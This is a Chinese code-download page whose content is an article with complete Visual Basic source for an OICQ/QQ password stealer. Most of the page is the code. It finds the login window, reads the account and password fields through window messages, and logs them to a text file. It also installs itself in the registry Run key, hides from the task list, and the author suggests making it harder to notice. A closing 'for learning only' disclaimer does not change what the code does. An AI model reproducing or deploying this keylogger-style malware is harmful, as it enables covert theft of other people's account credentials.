开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > ICQ弱点检测代码 > 查看源码
-
资源名称:QQ密码盗取.zip [点击查看]
上传用户:longston
上传日期:2007-05-02
资源大小:23k
文件大小:10k
源码类别:

ICQ弱点检测代码

开发平台:

Visual Basic

-:源码内容
  1. 在 VB 中使用窗口函数截取 OICQ 帐号密码
  2. 武汉 艾军
  3. 摘要     本文简单介绍如何采用 Visual Basic  语言,利用窗口函数截取 OICQ 帐号密码,并以此说明 OICQ 存在安全隐串。
  4. 关键字   密码,窗口函数,即时监视
  5. 一、引言
  6. OICQ 从无到有,现在可以说中国的每一个网吧都装有 OICQ,每一个上过网的人都用过 OICQ,那么 OICQ 的加密功能倒底怎么样呢, OICQ 版本从低到高,其加密功能也越来越强,现在破解 OICQ 密码的方法大致有:穷举法、直接读取密码文件两种。
  7. 先说穷举法,对于这种方法 OICQ 的各个版本,可以说都没有任何的防范的方法,也许他们认为这种破解方法不伤大雅,只要用户在使用 OICQ 时,把密码设长些就可以。现在像用穷举法进行 OICQ 密码破解的软件已非常多了,所以破解的原理也就不多说了。
  8. 再说直接读取密码文件,现在 OICQ 的加密越来越强,要用这种方法可以花上不少的功夫,而且在网吧上网的人,都有离开时,删除自己 OICQ 号目录的习惯,因此有时这种方法根本无能为力。
  9. 最后要说的,就是即时监视法,也就是本文章要介绍的,通过窗口函数取得密码的方法(适用任何版本的 OICQ)。
  10. 二、设计思路
  11. 我们知道 OICQ 的密码框并没有进行特别的处理,也就是说用可以通过 SendMessage 发送 WM_GETTEXT 取得密码框中的值,我们可以利用这一点来完成密码的截取,具体请看下面:
  12. 使用 Timer 控件,监视 OICQ。
  13. 用遍查窗口的方法(EnumWindows),取得所有的窗口标题(GetWindowText),判断其中是否为"OICQ用户登录"的标题,取得 OICQ 登录窗口的子窗口(窗口上的控件)的类名(GetClassName),然后通过 ComboBox、Edit 取得用户名和密码(通过 SendMessage 发送 WM_GETTEXT 取得值)。
  14. 由于不能判断外部按键事件的发生,只有通过不断的取得密码值,具体方法如下:
  15. 首先取得 用户名的值,然后不停的取密码的值,再判断窗口的标题是否为用户名,如果为用户名,则最后一次密码的值就是真正的密码,到此程序完成。
  16. 三、程序编制(完整的程序代码和注释)
  17. (1)首先为了避免程序被多次装载,造成系统资源的浪费、及不必要的错误。
  18. 声明变量、过程及 API 函数,写在 Module1.bas 文件中
  19. Declare Function CreateFileMapping Lib "kernel32" Alias "CreateFileMappingA" (ByVal hFile As Long, lpFileMappigAttributes As SECURITY_ATTRIBUTES, ByVal flProtect As Long, ByVal dwMaximumSizeHigh As Long, ByVal dwMaximumSizeLow As Long, ByVal lpName As String) As Long '创建一个新的文件映射对象 
  20. Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long  '关闭一个内核对象
  21. Type SECURITY_ATTRIBUTES
  22.         nLength As Long
  23.         lpSecurityDescriptor As Long
  24.         bInheritHandle As Long
  25. End Type
  26. Const PAGE_READWRITE = 1
  27. Const ERROR_ALREADY_EXISTS = 183&
  29. 建立判断程序是否多启动的过程
  30. Sub Main() 
  31. Dim ynRun As Long
  32. Dim sa As SECURITY_ATTRIBUTES
  34.   sa.bInheritHandle = 1
  35.   sa.lpSecurityDescriptor = 0
  36.   sa.nLength = Len(sa)
  37.   ynRun = CreateFileMapping(&HFFFFFFFF, sa, PAGE_READWRITE, 0, 128, App.title) '创建内存映射文件
  38.   If (Err.LastDllError = ERROR_ALREADY_EXISTS) Then '如果指定内存文件已存在,则退出
  39.       CloseHandle ynRun '退出程序前关闭内存映射文件
  40.       End
  41.   End If
  42. End Sub
  43. (2)即时监视,就需要在系统启动时,程序自启动,这里使用修改注册表的方法
  44. 声明变量、过程及 API 函数,写在 Module1.bas 文件中
  45. Declare Function RegCreateKey& Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey&, ByVal lpszSubKey$, lphKey&) '在指定的项下创建一个新项。如指定的项已经存在,那么函数会打开现有的项
  46. Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long '设置指定项或子项的默认值
  47. Const HKEY_LOCAL_MACHINE = &H80000002
  48. Const REG_SZ = 1
  49. 建立使程序自启动的过程
  50. Sub AutoRun()
  51. Dim sKeyName As String, sKeyValue As String, sKeyValueIcon As String
  52. Dim Ret As Integer, lphKey As Long
  53.   sKeyName = "SoftwareMicrosoftWindowsCurrentVersionRun" '是启动项在注册表中位置,大家可能通过 regedit.exe 来查看
  54.   sKeyValue = App.Path & IIf(Len(App.Path) > 3, "" & "KillOicq.exe", "KillOicq.exe") 'monitor.exe 为这个程序
  55.   Ret = RegCreateKey&(HKEY_LOCAL_MACHINE, sKeyName, lphKey) '创建新的启动项
  56.   Ret = RegSetValue&(lphKey&, "", REG_SZ, sKeyValue, 0&) '设置键值
  57. End Sub
  58. (3)实现程序自身的隐藏(Me.Hide)、在关闭程序对话框中隐藏。
  59. 声明变量、过程及 API 函数,写在 Module1.bas 文件中
  60. Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
  61. Const RSP_SIMPLE_SERVICE = 1 '隐藏
  62. 建立实现程序自身在关闭程序对话框中的隐藏的过程
  63. Sub HideMyWin()
  64.     RegisterServiceProcess lngProcessID, RSP_SIMPLE_SERVICE
  65. End Sub
  67. (4)即时监视是否运行了 OICQ
  68. 加载 1 个 Timer 控件,其 Interval 的值为1(你也可以自己设置,尽量少点),这个程序就是通过 Timer 来实现监视的。
  69. Private Sub Timer1_Timer()
  70.    EnumWindows AddressOf EnumProc, 0 '枚举窗口列表中的所有父窗口(顶级和被所有窗口),开始监视程序
  71. End Sub
  72. 声明变量、过程、函数及 API 函数,写在 Module1.bas 文件中
  73. Option Explicit
  74. Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Any, ByVal lParam As Long) As Long '遍查窗口
  75. Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long '取得窗口标题
  76. Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long '为指定的窗口取得类名
  77. Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long '获得一个窗口的句柄
  78. Const GW_CHILD = 5 '寻找源窗口的第一个子窗口
  79. Const GW_HWNDNEXT = 2 '为源窗口寻找下一个兄弟窗口
  80. Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal _
  81. wMsg As Long, ByVal wParam As Long, lParam As Any) As Long '发送消息
  82. Const WM_GETTEXT = &HD
  83. Const WM_GETTEXTLENGTH = &HE
  85. Dim buf As String
  86. Dim nameall, name, passwordall, password As String
  87. Dim i As Integer
  88. Dim title, titleall, filepath As String
  90. Public Function EnumProc(ByVal app_hwnd As Long, ByVal lParam As Long) As Boolean '遍查主窗口
  91. Dim buf As String * 1024
  92. Dim length As Long
  94.     filepath = App.Path & ".txt" '0.txt 为保存帐号、密码的文件
  95.     If Dir(filepath) = "" Then
  96.         title = ""
  97.         titleall = ""
  98.     End If
  99.     
  100.     length = GetWindowText(app_hwnd, buf, Len(buf))
  101.     title = Left$(buf, length) '取得窗口的标题
  103.     If InStr(title, "OICQ用户登录") Then '判断是否为 OICQ 窗口
  104.         Call GetZiWin(app_hwnd) '调用(5),取得 OICQ 窗口中的帐号、密码框的类名
  105.     End If
  106.     
  107.     If title <> "" Then 
  108.         If InStr(titleall, title) Then
  109.             EnumProc = 1
  110.     Else
  111.             titleall = titleall + title 'title 是指取得的窗口标题
  112.             If name <> "" Then '取得的帐号
  113.                 If InStr(title, name) Then SaveFile '保存帐号密码(如果取得的标题等于取得的帐号,则表示用户名、密码已顺利取出了),就调用(7)
  114.             End If
  115.     End If
  116. End If
  117. EnumProc = 1
  118. End Function
  120. (5)取得 OICQ 窗口中的用户名、密码框的类名
  121. 自定义取得子窗口类名的函数,写在 Module1.bas 文件中
  122. 我们知道 OICQ 主窗口的用户名的类名是 ComboBox,密码框的类名是 Edit,这里可以通过取得类名的办法,取得它们的句柄,从而取得它们的值。
  123. Public Function GetZiWin(window_hwnd As Long) As String
  124. Dim buflen As Long
  125. Dim child_hwnd As Long
  126. Dim children() As Long
  127. Dim num_children As Integer
  128. Dim i As Integer
  130.     '取得类名
  131.     buflen = 256
  132.     buf = Space$(buflen - 1)
  133.     buflen = GetClassName(window_hwnd, buf, buflen)
  134.     buf = Left$(buf, buflen)
  135.     
  136.     If Right(buf, 8) = "ComboBox" Or Right(buf, 4) = "Edit" Then '进行判断
  137.         GetZiWin = GetWinText(window_hwnd) '调用(6),取得它们的值
  138.         Exit Function
  139.     End If
  140.     num_children = 0
  141.     child_hwnd = GetWindow(window_hwnd, GW_CHILD) '取得第 1 个子窗口的句柄
  142.     Do While child_hwnd <> 0 '如果有子窗口
  143.         num_children = num_children + 1
  144.         ReDim Preserve children(1 To num_children)
  145.         children(num_children) = child_hwnd        
  146.         child_hwnd = GetWindow(child_hwnd, GW_HWNDNEXT) '取得下一个兄弟窗口的句柄
  147.     Loop
  148.     
  149.     For i = 1 To num_children
  150.         Call GetZiWin(children(i))
  151.     Next i
  152. End Function
  154. (6)通过(5)已得到了用户名、密码框的类名,也就取得了句柄,这一步进行取值
  155. 自定义取得子窗口的值的函数,写在 Module1.bas 文件中
  156. Public Function GetWinText(window_hwnd As Long) As String '取得子窗口的值
  157. Dim txtlen As Long
  158. Dim txt As String
  160.   '通过 SendMessage 发送 WM_GETTEXT 取得地址栏的值
  161.   GetWinText = ""
  162.   If window_hwnd = 0 Then Exit Function
  163.     
  164.   txtlen = SendMessage(window_hwnd, WM_GETTEXTLENGTH, 0, 0)
  165.   If txtlen = 0 Then Exit Function
  166.     
  167.   txtlen = txtlen + 1
  168.   txt = Space$(txtlen)
  169.   txtlen = SendMessage(window_hwnd, WM_GETTEXT, txtlen, ByVal txt)
  170.   GetWinText = Left$(txt, txtlen)
  171.     
  172.   If buf = "ComboBox" Then
  173.         name = GetWinText
  174.         If InStr(nameall, name) Then
  175.                 i = 0
  176.         Else
  177.                 nameall = nameall + name
  178.                 i = i + 1
  179.         End If
  180.   Else
  181.         password = GetWinText
  182.         If InStr(passwordall, password) Then
  183.                 i = 0
  184.         Else
  185.                 passwordall = passwordall + password
  186.                 i = i + 1
  187.         End If
  188.   End If
  189.   
  190. End Function
  192. (7)到现在,程序已进行收尾阶段,如果在(4)中判断用户名、密码顺得取出,则保存相关信息。
  193. 自定义保存信息的过程,写在 Module1.bas 文件中
  194. Sub SaveFile()
  195. Dim file_num As Integer
  196. Dim allstr As String
  197.   allstr = name & Space(5) & password & Space(5) & Now '保存帐号、密码、启动的时间
  198.   file_num = FreeFile
  199.   If Dir(filepath) = "" Then
  200.       Open filepath For Output As #file_num
  201.   Else
  202.       Open filepath For Append As #file_num
  203.   End If
  204.   Print #file_num, allstr
  205.   Close #file_num
  206. End Sub
  207. (8)到些为此程序全部完成,大家可把它编译为 KillOicq.exe 试一试。
  208. 四、程序补充:
  209. (1)我这里用的是遍查窗口的方式,取得窗口标题,大家也可用其他的窗口函数试试,我想应该会更好。
  210. (2)在程序编制(4)中,顺利取得帐号、密码的判断,希望大家多看几遍,多试试,这一部分的代码我感觉没有写好,希望大家能够正确理解。
  211. (5)由于使用的是监视法,因此比较耗系统资源,这样在配置较低的机器上,容易被别人发现,大家可对程序代码进行优化,使它占用的系统资源少点。
  212. 五、程序说明:
  213. 使用此软件后,在每次系统启动时该软件都会运行,监视 OICQ,当你打开 OICQ ,并输入密码,则该软件在软件所在目录记录里记下你的 OICQ 帐号和密码,并保存在 0.txt 文件里,你只要双击 0.txt 文件就能看到帐号、密码。   
  214. 六、补充说明
  215. 本程序在 VB5.0、Win98 环境下运行正常,作者通过此程序并不是让用户窃取别人的 OICQ 密码,只是为了学习的目的,大家如果还有什么问题可到 www.d1vb.com 来一起讨论。